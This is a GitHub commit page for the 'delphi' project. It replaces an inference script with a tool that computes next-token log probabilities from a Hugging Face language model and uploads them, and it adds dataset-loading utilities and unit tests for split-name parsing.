Skip to content

Commit

Permalink
get_next_logprobs revamp
Browse files Browse the repository at this point in the history
  • Loading branch information
jettjaniak committed Apr 26, 2024
1 parent 89b2b4b commit f08396f
Show file tree
Hide file tree
Showing 7 changed files with 185 additions and 133 deletions.
28 changes: 0 additions & 28 deletions scripts/generate_logprobs.sh

This file was deleted.

115 changes: 115 additions & 0 deletions scripts/get_next_logprobs.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,115 @@
#!/usr/bin/env python3
import argparse

import numpy as np
import torch
from datasets import Dataset
from tqdm.auto import trange
from transformers import AutoModelForCausalLM

from delphi import utils
from delphi.eval.utils import get_all_and_next_logprobs

torch.set_grad_enabled(False)


def main(
in_model_repo_id: str,
in_dataset_repo_id: str,
split: str,
feature: str,
batch_size: int,
out_repo_id: str,
):
"""
Outputs the log probabilities of the next token for each token in the dataset.
And uploads the resulting dataset to huggingface.
"""
model = AutoModelForCausalLM.from_pretrained(in_model_repo_id)
in_dataset_split = utils.load_dataset_split_sequence_int32_feature(
in_dataset_repo_id, split, feature
)
in_dataset_split.set_format("torch")
n_seq = len(in_dataset_split)
seq_len = len(in_dataset_split[0][feature])
logprobs = np.empty((n_seq, seq_len))
logprobs[:, 0] = float("nan")
print("Running inference...")
for i in trange(0, n_seq, batch_size):
batch_tokens = in_dataset_split[i : i + batch_size][feature]
logprobs[i : i + batch_size, 1:] = (
get_all_and_next_logprobs(model, batch_tokens)[1].cpu().numpy()
)

hf_dataset = Dataset.from_dict({"logprobs": [row for row in logprobs]})

hf_dataset.push_to_hub(
repo_id=out_repo_id,
split=utils.hf_split_to_split_name(split),
)


if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Run inference and generate log probabilities."
)
parser.add_argument(
"--in-model-repo-id",
"--im",
type=str,
required=True,
help="The model",
)
parser.add_argument(
"--in-dataset-repo-id",
"--id",
type=str,
required=True,
help="The tokenized dataset",
)
parser.add_argument(
"--feature",
"-f",
type=str,
required=True,
help="Name of the column containing token sequences in the input dataset",
)
parser.add_argument(
"--split",
"-s",
type=str,
required=True,
help="Split of the tokenized dataset, supports slicing like 'train[:10%%]'",
)
parser.add_argument(
"--out-repo-id",
"-o",
type=str,
required=True,
help="Where to upload the next logprobs",
)
parser.add_argument(
"--batch-size",
"-b",
type=int,
default=80,
help="How many sequences to evaluate at once",
)
# TODO
# parser.add_argument(
# "--chunk-size",
# "-c",
# type=int,
# default=200_000,
# help="Size of the parquet chunks uploaded to HuggingFace",
# )
args = parser.parse_args()

main(
in_model_repo_id=args.in_model_repo_id,
in_dataset_repo_id=args.in_dataset_repo_id,
split=args.split,
feature=args.feature,
batch_size=args.batch_size,
out_repo_id=args.out_repo_id,
)
105 changes: 0 additions & 105 deletions scripts/inference.py

This file was deleted.

50 changes: 50 additions & 0 deletions src/delphi/utils.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,50 @@
from typing import cast

from datasets import Dataset, Features, Sequence, Value, load_dataset


def hf_split_to_split_name(split: str) -> str:
return split.split("[")[0]


# TODO: test load_dataset functions
def load_dataset_split_features(
repo_id: str,
split: str,
features: Features,
) -> Dataset:
dataset = load_dataset(
repo_id,
split=split,
features=features,
)
dataset = cast(Dataset, dataset)
return dataset


def load_dataset_split_string_feature(
repo_id: str,
split: str,
feature_name: str,
) -> Dataset:
print("Loading string dataset")
print(f"{repo_id=}, {split=}, {feature_name=}")
return load_dataset_split_features(
repo_id,
split,
Features({feature_name: Value("string")}),
)


def load_dataset_split_sequence_int32_feature(
repo_id: str,
split: str,
feature_name: str,
) -> Dataset:
print("Loading sequence int32 dataset")
print(f"{repo_id=}, {split=}, {feature_name=}")
return load_dataset_split_features(
repo_id,
split,
Features({feature_name: Sequence(Value("int32"))}),
)
Empty file added tests/__init__.py
Empty file.
14 changes: 14 additions & 0 deletions tests/test_utils.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,14 @@
from delphi.utils import hf_split_to_split_name

from .utils import random_string


def test_hf_split_to_split_name():
random_split_name = random_string(5)
assert hf_split_to_split_name(random_split_name) == random_split_name
assert hf_split_to_split_name(f"{random_split_name}[:10%]") == random_split_name
assert hf_split_to_split_name(f"{random_split_name}[10%:]") == random_split_name
assert hf_split_to_split_name(f"{random_split_name}[10%:20%]") == random_split_name
assert hf_split_to_split_name(f"{random_split_name}[:200]") == random_split_name
assert hf_split_to_split_name(f"{random_split_name}[200:]") == random_split_name
assert hf_split_to_split_name(f"{random_split_name}[200:400]") == random_split_name
6 changes: 6 additions & 0 deletions tests/utils.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,6 @@
import random
import string


def random_string(length: int) -> str:
return "".join(random.choices(string.ascii_lowercase, k=length))

0 comments on commit f08396f

Please sign in to comment.